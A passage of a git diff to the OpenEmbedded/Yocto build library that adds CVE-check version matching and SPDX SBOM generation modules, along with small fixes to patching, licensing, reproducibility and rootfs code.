         logparam = '-l %s' % logfile
     else:
         logparam = ''
-    cmd = "%sBB_SETSCENE_ENFORCE=1 PSEUDO_DISABLED=1 oe-check-sstate %s -s -o %s %s" % (cmdprefix, targets, filteroutfile, logparam)
+    cmd = "%sPYTHONDONTWRITEBYTECODE=1 BB_SETSCENE_ENFORCE=1 PSEUDO_DISABLED=1 oe-check-sstate %s -s -o %s %s" % (cmdprefix, targets, filteroutfile, logparam)
     env = dict(d.getVar('BB_ORIGENV', False))
     env.pop('BUILDDIR', '')
     env.pop('BBPATH', '')
diff --git a/meta/lib/oe/cve_check.py b/meta/lib/oe/cve_check.py
new file mode 100644
index 0000000000..ed4af18ced
--- /dev/null
+++ b/meta/lib/oe/cve_check.py
@@ -0,0 +1,212 @@
+import collections
+import re
+import itertools
+import functools
+
+_Version = collections.namedtuple(
+    "_Version", ["release", "patch_l", "pre_l", "pre_v"]
+)
+
+@functools.total_ordering
+class Version():
+
+    def __init__(self, version, suffix=None):
+
+        suffixes = ["alphabetical", "patch"]
+
+        if str(suffix) == "alphabetical":
+            version_pattern =  r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<patch>[-_\.]?(?P<patch_l>[a-z]))?(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
+        elif str(suffix) == "patch":
+            version_pattern =  r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<patch>[-_\.]?(p|patch)(?P<patch_l>[0-9]+))?(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
+        else:
+            version_pattern =  r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
+        regex = re.compile(r"^\s*" + version_pattern + r"\s*$", re.VERBOSE | re.IGNORECASE)
+
+        match = regex.search(version)
+        if not match:
+            raise Exception("Invalid version: '{0}'".format(version))
+
+        self._version = _Version(
+            release=tuple(int(i) for i in match.group("release").replace("-",".").split(".")),
+            patch_l=match.group("patch_l") if str(suffix) in suffixes and match.group("patch_l") else "",
+            pre_l=match.group("pre_l"),
+            pre_v=match.group("pre_v")
+        )
+
+        self._key = _cmpkey(
+            self._version.release,
+            self._version.patch_l,
+            self._version.pre_l,
+            self._version.pre_v
+        )
+
+    def __eq__(self, other):
+        if not isinstance(other, Version):
+            return NotImplemented
+        return self._key == other._key
+
+    def __gt__(self, other):
+        if not isinstance(other, Version):
+            return NotImplemented
+        return self._key > other._key
+
+def _cmpkey(release, patch_l, pre_l, pre_v):
+    # remove leading 0
+    _release = tuple(
+        reversed(list(itertools.dropwhile(lambda x: x == 0, reversed(release))))
+    )
+
+    _patch = patch_l.upper()
+
+    if pre_l is None and pre_v is None:
+        _pre = float('inf')
+    else:
+        _pre = float(pre_v) if pre_v else float('-inf')
+    return _release, _patch, _pre
+
+def cve_check_merge_jsons(output, data):
+    """
+    Merge the data in the "package" property to the main data file
+    output
+    """
+    if output["version"] != data["version"]:
+        bb.error("Version mismatch when merging JSON outputs")
+        return
+
+    for product in output["package"]:
+        if product["name"] == data["package"][0]["name"]:
+            bb.error("Error adding the same package %s twice" % product["name"])
+            return
+
+    output["package"].append(data["package"][0])
+
+def update_symlinks(target_path, link_path):
+    """
+    Update a symbolic link link_path to point to target_path.
+    Remove the link and recreate it if exist and is different.
+    """
+    if link_path != target_path and os.path.exists(target_path):
+        if os.path.exists(os.path.realpath(link_path)):
+            os.remove(link_path)
+        os.symlink(os.path.basename(target_path), link_path)
+
+def get_patched_cves(d):
+    """
+    Get patches that solve CVEs using the "CVE: " tag.
+    """
+
+    import re
+    import oe.patch
+
+    pn = d.getVar("PN")
+    cve_match = re.compile("CVE:( CVE\-\d{4}\-\d+)+")
+
+    # Matches the last "CVE-YYYY-ID" in the file name, also if written
+    # in lowercase. Possible to have multiple CVE IDs in a single
+    # file name, but only the last one will be detected from the file name.
+    # However, patch files contents addressing multiple CVE IDs are supported
+    # (cve_match regular expression)
+
+    cve_file_name_match = re.compile(".*([Cc][Vv][Ee]\-\d{4}\-\d+)")
+
+    patched_cves = set()
+    bb.debug(2, "Looking for patches that solves CVEs for %s" % pn)
+    for url in oe.patch.src_patches(d):
+        patch_file = bb.fetch.decodeurl(url)[2]
+
+        # Check patch file name for CVE ID
+        fname_match = cve_file_name_match.search(patch_file)
+        if fname_match:
+            cve = fname_match.group(1).upper()
+            patched_cves.add(cve)
+            bb.debug(2, "Found CVE %s from patch file name %s" % (cve, patch_file))
+
+        # Remote patches won't be present and compressed patches won't be
+        # unpacked, so say we're not scanning them
+        if not os.path.isfile(patch_file):
+            bb.note("%s is remote or compressed, not scanning content" % patch_file)
+            continue
+
+        with open(patch_file, "r", encoding="utf-8") as f:
+            try:
+                patch_text = f.read()
+            except UnicodeDecodeError:
+                bb.debug(1, "Failed to read patch %s using UTF-8 encoding"
+                        " trying with iso8859-1" %  patch_file)
+                f.close()
+                with open(patch_file, "r", encoding="iso8859-1") as f:
+                    patch_text = f.read()
+
+        # Search for one or more "CVE: " lines
+        text_match = False
+        for match in cve_match.finditer(patch_text):
+            # Get only the CVEs without the "CVE: " tag
+            cves = patch_text[match.start()+5:match.end()]
+            for cve in cves.split():
+                bb.debug(2, "Patch %s solves %s" % (patch_file, cve))
+                patched_cves.add(cve)
+                text_match = True
+
+        if not fname_match and not text_match:
+            bb.debug(2, "Patch %s doesn't solve CVEs" % patch_file)
+
+    return patched_cves
+
+
+def get_cpe_ids(cve_product, version):
+    """
+    Get list of CPE identifiers for the given product and version
+    """
+
+    version = version.split("+git")[0]
+
+    cpe_ids = []
+    for product in cve_product.split():
+        # CVE_PRODUCT in recipes may include vendor information for CPE identifiers. If not,
+        # use wildcard for vendor.
+        if ":" in product:
+            vendor, product = product.split(":", 1)
+        else:
+            vendor = "*"
+
+        cpe_id = 'cpe:2.3:a:{}:{}:{}:*:*:*:*:*:*:*'.format(vendor, product, version)
+        cpe_ids.append(cpe_id)
+
+    return cpe_ids
+
+def convert_cve_version(version):
+    """
+    This function converts from CVE format to Yocto version format.
+    eg 8.3_p1 -> 8.3p1, 6.2_rc1 -> 6.2-rc1
+
+    Unless it is redefined using CVE_VERSION in the recipe,
+    cve_check uses the version in the name of the recipe (${PV})
+    to check vulnerabilities against a CVE in the database downloaded from NVD.
+
+    When the version has an update, i.e.
+    "p1" in OpenSSH 8.3p1,
+    "-rc1" in linux kernel 6.2-rc1,
+    the database stores the version as version_update (8.3_p1, 6.2_rc1).
+    Therefore, we must transform this version before comparing to the
+    recipe version.
+
+    In this case, the parameter of the function is 8.3_p1.
+    If the version uses the Release Candidate format, "rc",
+    this function replaces the '_' by '-'.
+    If the version uses the Update format, "p",
+    this function removes the '_' completely.
+    """
+    import re
+
+    matches = re.match('^([0-9.]+)_((p|rc)[0-9]+)$', version)
+
+    if not matches:
+        return version
+
+    version = matches.group(1)
+    update = matches.group(2)
+
+    if matches.group(3) == "rc":
+        return version + '-' + update
+
+    return version + update
diff --git a/meta/lib/oe/gpg_sign.py b/meta/lib/oe/gpg_sign.py
index 7634d7ef1d..492f096eaa 100644
--- a/meta/lib/oe/gpg_sign.py
+++ b/meta/lib/oe/gpg_sign.py
@@ -111,7 +111,7 @@ class LocalSigner(object):
 
     def verify(self, sig_file):
         """Verify signature"""
-        cmd = self.gpg_cmd + [" --verify", "--no-permission-warning"]
+        cmd = self.gpg_cmd + ["--verify", "--no-permission-warning"]
         if self.gpg_path:
             cmd += ["--homedir", self.gpg_path]
 
diff --git a/meta/lib/oe/license.py b/meta/lib/oe/license.py
index c1274a61de..c4efbe142b 100644
--- a/meta/lib/oe/license.py
+++ b/meta/lib/oe/license.py
@@ -81,6 +81,9 @@ class FlattenVisitor(LicenseVisitor):
     def visit_Str(self, node):
         self.licenses.append(node.s)
 
+    def visit_Constant(self, node):
+        self.licenses.append(node.value)
+
     def visit_BinOp(self, node):
         if isinstance(node.op, ast.BitOr):
             left = FlattenVisitor(self.choose_licenses)
@@ -234,6 +237,9 @@ class ListVisitor(LicenseVisitor):
     def visit_Str(self, node):
         self.licenses.add(node.s)
 
+    def visit_Constant(self, node):
+        self.licenses.add(node.value)
+
 def list_licenses(licensestr):
     """Simply get a list of all licenses mentioned in a license string.
        Binary operators are not applied or taken into account in any way"""
diff --git a/meta/lib/oe/package_manager.py b/meta/lib/oe/package_manager.py
index b0660411ea..502dfbe3ed 100644
--- a/meta/lib/oe/package_manager.py
+++ b/meta/lib/oe/package_manager.py
@@ -403,7 +403,7 @@ class PackageManager(object, metaclass=ABCMeta):
         bb.utils.remove(self.intercepts_dir, True)
         bb.utils.mkdirhier(self.intercepts_dir)
         for intercept in postinst_intercepts:
-            bb.utils.copyfile(intercept, os.path.join(self.intercepts_dir, os.path.basename(intercept)))
+            shutil.copy(intercept, os.path.join(self.intercepts_dir, os.path.basename(intercept)))
 
     @abstractmethod
     def _handle_intercept_failure(self, failed_script):
@@ -611,12 +611,13 @@ class PackageManager(object, metaclass=ABCMeta):
                          "'%s' returned %d:\n%s" %
                          (' '.join(cmd), e.returncode, e.output.decode("utf-8")))
 
-        target_arch = self.d.getVar('TARGET_ARCH')
-        localedir = oe.path.join(self.target_rootfs, self.d.getVar("libdir"), "locale")
-        if os.path.exists(localedir) and os.listdir(localedir):
-            generate_locale_archive(self.d, self.target_rootfs, target_arch, localedir)
-            # And now delete the binary locales
-            self.remove(fnmatch.filter(self.list_installed(), "glibc-binary-localedata-*"), False)
+        if self.d.getVar('IMAGE_LOCALES_ARCHIVE') == '1':
+            target_arch = self.d.getVar('TARGET_ARCH')
+            localedir = oe.path.join(self.target_rootfs, self.d.getVar("libdir"), "locale")
+            if os.path.exists(localedir) and os.listdir(localedir):
+                generate_locale_archive(self.d, self.target_rootfs, target_arch, localedir)
+                # And now delete the binary locales
+                self.remove(fnmatch.filter(self.list_installed(), "glibc-binary-localedata-*"), False)
 
     def deploy_dir_lock(self):
         if self.deploy_dir is None:
diff --git a/meta/lib/oe/packagedata.py b/meta/lib/oe/packagedata.py
index a82085a792..feb834c0e3 100644
--- a/meta/lib/oe/packagedata.py
+++ b/meta/lib/oe/packagedata.py
@@ -57,6 +57,17 @@ def read_subpkgdata_dict(pkg, d):
         ret[newvar] = subd[var]
     return ret
 
+def read_subpkgdata_extended(pkg, d):
+    import json
+    import gzip
+
+    fn = d.expand("${PKGDATA_DIR}/extended/%s.json.gz" % pkg)
+    try:
+        with gzip.open(fn, "rt", encoding="utf-8") as f:
+            return json.load(f)
+    except FileNotFoundError:
+        return None
+
 def _pkgmap(d):
     """Return a dictionary mapping package to recipe name."""
 
diff --git a/meta/lib/oe/patch.py b/meta/lib/oe/patch.py
index 7ca2e28b1f..feb6ee7082 100644
--- a/meta/lib/oe/patch.py
+++ b/meta/lib/oe/patch.py
@@ -2,6 +2,9 @@
 # SPDX-License-Identifier: GPL-2.0-only
 #
 
+import os
+import shlex
+import subprocess
 import oe.path
 import oe.types
 
@@ -24,7 +27,6 @@ class CmdError(bb.BBHandledException):
 
 
 def runcmd(args, dir = None):
-    import pipes
     import subprocess
 
     if dir:
@@ -35,7 +37,7 @@ def runcmd(args, dir = None):
         # print("cwd: %s -> %s" % (olddir, dir))
 
     try:
-        args = [ pipes.quote(str(arg)) for arg in args ]
+        args = [ shlex.quote(str(arg)) for arg in args ]
         cmd = " ".join(args)
         # print("cmd: %s" % cmd)
         (exitstatus, output) = subprocess.getstatusoutput(cmd)
@@ -512,7 +514,7 @@ class GitApplyTree(PatchTree):
             try:
                 shellcmd = [patchfilevar, "git", "--work-tree=%s" % reporoot]
                 self.gitCommandUserOptions(shellcmd, self.commituser, self.commitemail)
-                shellcmd += ["am", "-3", "--keep-cr", "-p%s" % patch['strippath']]
+                shellcmd += ["am", "-3", "--keep-cr", "--no-scissors", "-p%s" % patch['strippath']]
                 return _applypatchhelper(shellcmd, patch, force, reverse, run)
             except CmdError:
                 # Need to abort the git am, or we'll still be within it at the end
diff --git a/meta/lib/oe/path.py b/meta/lib/oe/path.py
index 082972457b..c8d8ad05b9 100644
--- a/meta/lib/oe/path.py
+++ b/meta/lib/oe/path.py
@@ -320,3 +320,24 @@ def which_wild(pathname, path=None, mode=os.F_OK, *, reverse=False, candidates=F
 
     return files
 
+def canonicalize(paths, sep=','):
+    """Given a string with paths (separated by commas by default), expand
+    each path using os.path.realpath() and return the resulting paths as a
+    string (separated using the same separator a the original string).
+    """
+    # Ignore paths containing "$" as they are assumed to be unexpanded bitbake
+    # variables. Normally they would be ignored, e.g., when passing the paths
+    # through the shell they would expand to empty strings. However, when they
+    # are passed through os.path.realpath(), it will cause them to be prefixed
+    # with the absolute path to the current directory and thus not be empty
+    # anymore.
+    #
+    # Also maintain trailing slashes, as the paths may actually be used as
+    # prefixes in sting compares later on, where the slashes then are important.
+    canonical_paths = []
+    for path in (paths or '').split(sep):
+        if '$' not in path:
+            trailing_slash = path.endswith('/') and '/' or ''
+            canonical_paths.append(os.path.realpath(path) + trailing_slash)
+
+    return sep.join(canonical_paths)
diff --git a/meta/lib/oe/prservice.py b/meta/lib/oe/prservice.py
index 2d3c9c7e50..fcdbe66c19 100644
--- a/meta/lib/oe/prservice.py
+++ b/meta/lib/oe/prservice.py
@@ -3,10 +3,6 @@
 #
 
 def prserv_make_conn(d, check = False):
-    # Otherwise this fails when called from recipes which e.g. inherit python3native (which sets _PYTHON_SYSCONFIGDATA_NAME) with:
-    # No module named '_sysconfigdata'
-    if '_PYTHON_SYSCONFIGDATA_NAME' in os.environ:
-        del os.environ['_PYTHON_SYSCONFIGDATA_NAME']
     import prserv.serv
     host_params = list([_f for _f in (d.getVar("PRSERV_HOST") or '').split(':') if _f])
     try:
diff --git a/meta/lib/oe/qa.py b/meta/lib/oe/qa.py
index ea831b930a..e8a854a302 100644
--- a/meta/lib/oe/qa.py
+++ b/meta/lib/oe/qa.py
@@ -156,6 +156,7 @@ def elf_machine_to_string(machine):
     """
     try:
         return {
+            0x00: "Unset",
             0x02: "SPARC",
             0x03: "x86",
             0x08: "MIPS",
diff --git a/meta/lib/oe/recipeutils.py b/meta/lib/oe/recipeutils.py
index fde1ad3ddd..f36a2fb0ac 100644
--- a/meta/lib/oe/recipeutils.py
+++ b/meta/lib/oe/recipeutils.py
@@ -409,7 +409,7 @@ def copy_recipe_files(d, tgt_dir, whole_dir=False, download=True, all_variants=F
                 fetch.download()
             for pth in fetch.localpaths():
                 if pth not in localpaths:
-                    localpaths.append(pth)
+                    localpaths.append(os.path.abspath(pth))
             uri_values.append(srcuri)
 
     fetch_urls(d)
diff --git a/meta/lib/oe/reproducible.py b/meta/lib/oe/reproducible.py
index 421bb12f54..1ed79b18ca 100644
--- a/meta/lib/oe/reproducible.py
+++ b/meta/lib/oe/reproducible.py
@@ -41,13 +41,13 @@ def find_git_folder(d, sourcedir):
     for root, dirs, files in os.walk(workdir, topdown=True):
         dirs[:] = [d for d in dirs if d not in exclude]
         if '.git' in dirs:
-            return root
+            return os.path.join(root, ".git")
 
     bb.warn("Failed to find a git repository in WORKDIR: %s" % workdir)
     return None
 
 def get_source_date_epoch_from_git(d, sourcedir):
-    if not "git://" in d.getVar('SRC_URI'):
+    if not "git://" in d.getVar('SRC_URI') and not "gitsm://" in d.getVar('SRC_URI'):
         return None
 
     gitpath = find_git_folder(d, sourcedir)
@@ -62,7 +62,8 @@ def get_source_date_epoch_from_git(d, sourcedir):
         return None
 
     bb.debug(1, "git repository: %s" % gitpath)
-    p = subprocess.run(['git', '--git-dir', gitpath, 'log', '-1', '--pretty=%ct'], check=True, stdout=subprocess.PIPE)
+    p = subprocess.run(['git', '-c', 'log.showSignature=false', '--git-dir', gitpath, 'log', '-1', '--pretty=%ct'],
+                       check=True, stdout=subprocess.PIPE)
     return int(p.stdout.decode('utf-8'))
 
 def get_source_date_epoch_from_youngest_file(d, sourcedir):
@@ -90,8 +91,12 @@ def get_source_date_epoch_from_youngest_file(d, sourcedir):
         bb.debug(1, "Newest file found: %s" % newest_file)
     return source_date_epoch
 
-def fixed_source_date_epoch():
+def fixed_source_date_epoch(d):
     bb.debug(1, "No tarball or git repo found to determine SOURCE_DATE_EPOCH")
+    source_date_epoch = d.getVar('SOURCE_DATE_EPOCH_FALLBACK')
+    if source_date_epoch:
+        bb.debug(1, "Using SOURCE_DATE_EPOCH_FALLBACK")
+        return int(source_date_epoch)
     return 0
 
 def get_source_date_epoch(d, sourcedir):
@@ -99,6 +104,6 @@ def get_source_date_epoch(d, sourcedir):
         get_source_date_epoch_from_git(d, sourcedir) or
         get_source_date_epoch_from_known_files(d, sourcedir) or
         get_source_date_epoch_from_youngest_file(d, sourcedir) or
-        fixed_source_date_epoch()       # Last resort
+        fixed_source_date_epoch(d)       # Last resort
     )
 
diff --git a/meta/lib/oe/rootfs.py b/meta/lib/oe/rootfs.py
index cd65e62030..5391c25af9 100644
--- a/meta/lib/oe/rootfs.py
+++ b/meta/lib/oe/rootfs.py
@@ -167,7 +167,7 @@ class Rootfs(object, metaclass=ABCMeta):
             pass
         os.rename(self.image_rootfs, self.image_rootfs + '-dbg')
 
-        bb.note("  Restoreing original rootfs...")
+        bb.note("  Restoring original rootfs...")
         os.rename(self.image_rootfs + '-orig', self.image_rootfs)
 
     def _exec_shell_cmd(self, cmd):
@@ -304,7 +304,7 @@ class Rootfs(object, metaclass=ABCMeta):
     def _check_for_kernel_modules(self, modules_dir):
         for root, dirs, files in os.walk(modules_dir, topdown=True):
             for name in files:
-                found_ko = name.endswith(".ko")
+                found_ko = name.endswith((".ko", ".ko.gz", ".ko.xz"))
                 if found_ko:
                     return found_ko
         return False
@@ -321,7 +321,9 @@ class Rootfs(object, metaclass=ABCMeta):
         if not os.path.exists(kernel_abi_ver_file):
             bb.fatal("No kernel-abiversion file found (%s), cannot run depmod, aborting" % kernel_abi_ver_file)
 
-        kernel_ver = open(kernel_abi_ver_file).read().strip(' \n')
+        with open(kernel_abi_ver_file) as f:
+            kernel_ver = f.read().strip(' \n')
+
         versioned_modules_dir = os.path.join(self.image_rootfs, modules_dir, kernel_ver)
 
         bb.utils.mkdirhier(versioned_modules_dir)
diff --git a/meta/lib/oe/sbom.py b/meta/lib/oe/sbom.py
new file mode 100644
index 0000000000..22ed5070ea
--- /dev/null
+++ b/meta/lib/oe/sbom.py
@@ -0,0 +1,84 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+import collections
+
+DepRecipe = collections.namedtuple("DepRecipe", ("doc", "doc_sha1", "recipe"))
+DepSource = collections.namedtuple("DepSource", ("doc", "doc_sha1", "recipe", "file"))
+
+
+def get_recipe_spdxid(d):
+    return "SPDXRef-%s-%s" % ("Recipe", d.getVar("PN"))
+
+
+def get_download_spdxid(d, idx):
+    return "SPDXRef-Download-%s-%d" % (d.getVar("PN"), idx)
+
+
+def get_package_spdxid(pkg):
+    return "SPDXRef-Package-%s" % pkg
+
+
+def get_source_file_spdxid(d, idx):
+    return "SPDXRef-SourceFile-%s-%d" % (d.getVar("PN"), idx)
+
+
+def get_packaged_file_spdxid(pkg, idx):
+    return "SPDXRef-PackagedFile-%s-%d" % (pkg, idx)
+
+
+def get_image_spdxid(img):
+    return "SPDXRef-Image-%s" % img
+
+
+def get_sdk_spdxid(sdk):
+    return "SPDXRef-SDK-%s" % sdk
+
+
+def write_doc(d, spdx_doc, subdir, spdx_deploy=None, indent=None):
+    from pathlib import Path
+
+    if spdx_deploy is None:
+        spdx_deploy = Path(d.getVar("SPDXDEPLOY"))
+
+    dest = spdx_deploy / subdir / (spdx_doc.name + ".spdx.json")
+    dest.parent.mkdir(exist_ok=True, parents=True)
+    with dest.open("wb") as f:
+        doc_sha1 = spdx_doc.to_json(f, sort_keys=True, indent=indent)
+
+    l = spdx_deploy / "by-namespace" / spdx_doc.documentNamespace.replace("/", "_")
+    l.parent.mkdir(exist_ok=True, parents=True)
+    l.symlink_to(os.path.relpath(dest, l.parent))
+
+    return doc_sha1
+
+
+def read_doc(fn):
+    import hashlib
+    import oe.spdx
+    import io
+    import contextlib
+
+    @contextlib.contextmanager
+    def get_file():
+        if isinstance(fn, io.IOBase):
+            yield fn
+        else:
+            with fn.open("rb") as f:
+                yield f
+
+    with get_file() as f:
+        sha1 = hashlib.sha1()
+        while True:
+            chunk = f.read(4096)
+            if not chunk:
+                break
+            sha1.update(chunk)
+
+        f.seek(0)
+        doc = oe.spdx.SPDXDocument.from_json(f)
+
+    return (doc, sha1.hexdigest())
diff --git a/meta/lib/oe/spdx.py b/meta/lib/oe/spdx.py
new file mode 100644
index 0000000000..7aaf2af5ed
--- /dev/null
+++ b/meta/lib/oe/spdx.py
@@ -0,0 +1,357 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+#
+# This library is intended to capture the JSON SPDX specification in a type
+# safe manner. It is not intended to encode any particular OE specific
+# behaviors, see the sbom.py for that.
+#
+# The documented SPDX spec document doesn't cover the JSON syntax for
+# particular configuration, which can make it hard to determine what the JSON
+# syntax should be. I've found it is actually much simpler to read the official
+# SPDX JSON schema which can be found here: https://github.com/spdx/spdx-spec
+# in schemas/spdx-schema.json
+#
+
+import hashlib
+import itertools
+import json
+
+SPDX_VERSION = "2.2"
+
+
+#
+# The following are the support classes that are used to implement SPDX object
+#
+
+class _Property(object):
+    """
+    A generic SPDX object property. The different types will derive from this
+    class
+    """
+
+    def __init__(self, *, default=None):
+        self.default = default
+
+    def setdefault(self, dest, name):
+        if self.default is not None:
+            dest.setdefault(name, self.default)
+
+
+class _String(_Property):
+    """
+    A scalar string property for an SPDX object
+    """
+
+    def __init__(self, **kwargs):
+        super().__init__(**kwargs)
+
+    def set_property(self, attrs, name):
+        def get_helper(obj):
+            return obj._spdx[name]
+
+        def set_helper(obj, value):
+            obj._spdx[name] = value
+
+        def del_helper(obj):
+            del obj._spdx[name]
+
+        attrs[name] = property(get_helper, set_helper, del_helper)
+
+    def init(self, source):
+        return source
+
+
+class _Object(_Property):
+    """
+    A scalar SPDX object property of a SPDX object
+    """
+
+    def __init__(self, cls, **kwargs):
+        super().__init__(**kwargs)
+        self.cls = cls
+
+    def set_property(self, attrs, name):
+        def get_helper(obj):
+            if not name in obj._spdx:
+                obj._spdx[name] = self.cls()
+            return obj._spdx[name]
+
+        def set_helper(obj, value):
+            obj._spdx[name] = value
+
+        def del_helper(obj):
+            del obj._spdx[name]
+
+        attrs[name] = property(get_helper, set_helper)
+
+    def init(self, source):
+        return self.cls(**source)
+
+
+class _ListProperty(_Property):
+    """
+    A list of SPDX properties
+    """
+
+    def __init__(self, prop, **kwargs):
+        super().__init__(**kwargs)
+        self.prop = prop
+
+    def set_property(self, attrs, name):
+        def get_helper(obj):
+            if not name in obj._spdx:
+                obj._spdx[name] = []
+            return obj._spdx[name]
+
+        def set_helper(obj, value):
+            obj._spdx[name] = list(value)
+
+        def del_helper(obj):
+            del obj._spdx[name]
+
+        attrs[name] = property(get_helper, set_helper, del_helper)
+
+    def init(self, source):
+        return [self.prop.init(o) for o in source]
+
+
+class _StringList(_ListProperty):
+    """
+    A list of strings as a property for an SPDX object
+    """
+
+    def __init__(self, **kwargs):
+        super().__init__(_String(), **kwargs)
+
+
+class _ObjectList(_ListProperty):
+    """
+    A list of SPDX objects as a property for an SPDX object
+    """
+
+    def __init__(self, cls, **kwargs):
+        super().__init__(_Object(cls), **kwargs)
+
+
+class MetaSPDXObject(type):
+    """
+    A metaclass that allows properties (anything derived from a _Property
+    class) to be defined for a SPDX object
+    """
+    def __new__(mcls, name, bases, attrs):
+        attrs["_properties"] = {}
+
+        for key in attrs.keys():
+            if isinstance(attrs[key], _Property):
+                prop = attrs[key]
+                attrs["_properties"][key] = prop
+                prop.set_property(attrs, key)
+
+        return super().__new__(mcls, name, bases, attrs)
+
+
+class SPDXObject(metaclass=MetaSPDXObject):
+    """
+    The base SPDX object; all SPDX spec classes must derive from this class
+    """
+    def __init__(self, **d):
+        self._spdx = {}
+
+        for name, prop in self._properties.items():
+            prop.setdefault(self._spdx, name)
+            if name in d:
+                self._spdx[name] = prop.init(d[name])
+
+    def serializer(self):
+        return self._spdx
+
+    def __setattr__(self, name, value):
+        if name in self._properties or name == "_spdx":
+            super().__setattr__(name, value)
+            return
+        raise KeyError("%r is not a valid SPDX property" % name)
+
+#
+# These are the SPDX objects implemented from the spec. The *only* properties
+# that can be added to these objects are ones directly specified in the SPDX
+# spec, however you may add helper functions to make operations easier.
+#
+# Defaults should *only* be specified if the SPDX spec says there is a certain
+# required value for a field (e.g. dataLicense), or if the field is mandatory
+# and has some sane "this field is unknown" (e.g. "NOASSERTION")
+#
+
+class SPDXAnnotation(SPDXObject):
+    annotationDate = _String()
+    annotationType = _String()
+    annotator = _String()
+    comment = _String()
+
+class SPDXChecksum(SPDXObject):
+    algorithm = _String()
+    checksumValue = _String()
+
+
+class SPDXRelationship(SPDXObject):
+    spdxElementId = _String()
+    relatedSpdxElement = _String()
+    relationshipType = _String()
+    comment = _String()
+    annotations = _ObjectList(SPDXAnnotation)
+
+
+class SPDXExternalReference(SPDXObject):
+    referenceCategory = _String()
+    referenceType = _String()
+    referenceLocator = _String()
+
+
+class SPDXPackageVerificationCode(SPDXObject):
+    packageVerificationCodeValue = _String()
+    packageVerificationCodeExcludedFiles = _StringList()
+
+
+class SPDXPackage(SPDXObject):
+    ALLOWED_CHECKSUMS = [
+        "SHA1",
+        "SHA224",
+        "SHA256",
+        "SHA384",
+        "SHA512",
+        "MD2",
+        "MD4",
+        "MD5",
+        "MD6",
+    ]
+
+    name = _String()
+    SPDXID = _String()
+    versionInfo = _String()
+    downloadLocation = _String(default="NOASSERTION")
+    supplier = _String(default="NOASSERTION")
+    homepage = _String()
+    licenseConcluded = _String(default="NOASSERTION")
+    licenseDeclared = _String(default="NOASSERTION")
+    summary = _String()
+    description = _String()
+    sourceInfo = _String()
+    copyrightText = _String(default="NOASSERTION")
+    licenseInfoFromFiles = _StringList(default=["NOASSERTION"])
+    externalRefs = _ObjectList(SPDXExternalReference)
+    packageVerificationCode = _Object(SPDXPackageVerificationCode)
+    hasFiles = _StringList()
+    packageFileName = _String()
+    annotations = _ObjectList(SPDXAnnotation)
+    checksums = _ObjectList(SPDXChecksum)
+
+
+class SPDXFile(SPDXObject):
+    SPDXID = _String()
+    fileName = _String()
+    licenseConcluded = _String(default="NOASSERTION")
+    copyrightText = _String(default="NOASSERTION")
+    licenseInfoInFiles = _StringList(default=["NOASSERTION"])
+    checksums = _ObjectList(SPDXChecksum)
+    fileTypes = _StringList()
+
+
+class SPDXCreationInfo(SPDXObject):
+    created = _String()
+    licenseListVersion = _String()
+    comment = _String()
+    creators = _StringList()
+
+
+class SPDXExternalDocumentRef(SPDXObject):
+    externalDocumentId = _String()
+    spdxDocument = _String()
+    checksum = _Object(SPDXChecksum)
+
+
+class SPDXExtractedLicensingInfo(SPDXObject):
+    name = _String()
+    comment = _String()
+    licenseId = _String()
+    extractedText = _String()
+
+
+class SPDXDocument(SPDXObject):
+    spdxVersion = _String(default="SPDX-" + SPDX_VERSION)
+    dataLicense = _String(default="CC0-1.0")
+    SPDXID = _String(default="SPDXRef-DOCUMENT")
+    name = _String()
+    documentNamespace = _String()
+    creationInfo = _Object(SPDXCreationInfo)
+    packages = _ObjectList(SPDXPackage)
+    files = _ObjectList(SPDXFile)
+    relationships = _ObjectList(SPDXRelationship)
+    externalDocumentRefs = _ObjectList(SPDXExternalDocumentRef)
+    hasExtractedLicensingInfos = _ObjectList(SPDXExtractedLicensingInfo)
+
+    def __init__(self, **d):
+        super().__init__(**d)
+
+    def to_json(self, f, *, sort_keys=False, indent=None, separators=None):
+        class Encoder(json.JSONEncoder):
+            def default(self, o):
+                if isinstance(o, SPDXObject):
+                    return o.serializer()
+
+                return super().default(o)
+
+        sha1 = hashlib.sha1()
+        for chunk in Encoder(
+            sort_keys=sort_keys,
+            indent=indent,
+            separators=separators,
+        ).iterencode(self):
+            chunk = chunk.encode("utf-8")
+            f.write(chunk)
+            sha1.update(chunk)
+
+        return sha1.hexdigest()
+
+    @classmethod
+    def from_json(cls, f):
+        return cls(**json.load(f))
+
+    def add_relationship(self, _from, relationship, _to, *, comment=None, annotation=None):
+        if isinstance(_from, SPDXObject):
+            from_spdxid = _from.SPDXID
+        else:
+            from_spdxid = _from
+
+        if isinstance(_to, SPDXObject):
+            to_spdxid = _to.SPDXID
+        else:
+            to_spdxid = _to
+
+        r = SPDXRelationship(
+            spdxElementId=from_spdxid,
+            relatedSpdxElement=to_spdxid,
+            relationshipType=relationship,
+        )
+
+        if comment is not None:
+            r.comment = comment
+
+        if annotation is not None:
+            r.annotations.append(annotation)
+
+        self.relationships.append(r)
+
+    def find_by_spdxid(self, spdxid):
+        for o in itertools.chain(self.packages, self.files):
+            if o.SPDXID == spdxid:
+                return o
+        return None
+
+    def find_external_document_ref(self, namespace):
+        for r in self.externalDocumentRefs:
+            if r.spdxDocument == namespace:
+                return r
+        return None
diff --git a/meta/lib/oe/sstatesig.py b/meta/lib/oe/sstatesig.py
index d5a6200562..65bb4efe25 100644
--- a/meta/lib/oe/sstatesig.py
+++ b/meta/lib/oe/sstatesig.py
@@ -434,7 +434,7 @@ def find_sstate_manifest(taskdata, taskdata2, taskname, d, multilibcache):
         d2 = multilibcache[variant]
 
     if taskdata.endswith("-native"):
-        pkgarchs = ["${BUILD_ARCH}"]
